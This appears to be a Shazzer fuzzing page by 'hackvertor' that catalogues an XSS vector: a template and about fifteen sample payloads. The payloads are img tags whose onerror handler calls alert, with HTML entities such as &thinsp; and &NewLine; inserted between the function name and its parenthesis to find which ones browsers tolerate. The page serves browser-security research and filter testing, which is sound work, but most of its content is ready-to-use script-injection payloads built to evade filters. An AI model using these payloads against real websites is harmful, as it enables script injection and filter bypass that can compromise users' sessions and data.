Entities allowed between function calls

This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created by: hackvertor

Created on: Saturday, June 29, 2024 at 1:55:26 PM

Updated on: Monday, March 17, 2025 at 3:01:36 PM

Vector type: XSS

Vector charset: UTF-8

Vector data 1: html_entities

Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">

Your browser was detected as:

Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert&puncsp;('&puncsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert&hairsp;('&hairsp;')"><img src=data: onerror="alert&emsp;('&emsp;')"><img src=data: onerror="alert&NonBreakingSpace;('&NonBreakingSpace;')"><img src=data: onerror="alert&NewLine;('&NewLine;')"><img src=data: onerror="alert&emsp13;('&emsp13;')"><img src=data: onerror="alert&emsp14;('&emsp14;')"><img src=data: onerror="alert&ensp;('&ensp;')"><img src=data: onerror="alert&Tab;('&Tab;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert&numsp;('&numsp;')"><img src=data: onerror="alert&VeryThinSpace;('&VeryThinSpace;')">

Entities allowed between function calls

Sample payloads

Fuzz results